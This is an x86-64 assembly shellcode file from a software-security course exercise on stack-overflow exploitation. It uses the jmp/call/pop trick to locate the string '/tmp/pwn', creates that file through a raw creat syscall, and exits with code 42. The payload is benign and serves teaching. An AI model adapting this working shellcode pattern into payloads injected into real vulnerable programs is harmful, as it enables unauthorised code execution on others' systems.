cours/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S

.text
.globl _start

_start:
    jmp indirect
    
p:
    xorq %rdi, %rdi
    pop %rdi
    #shr $0x8, %rdi
    push $0x1b6
    xor %rsi, %rsi
    pop %rsi
    push $85
    pop %rax
    syscall

    xorq %rax, %rax
    xorq %rdi, %rdi
	push $42
    pop %rdi
	push $61
    pop %rax
    lea -1(%rax), %rax
	syscall

indirect:
    call p
	.asciz "/tmp/pwn"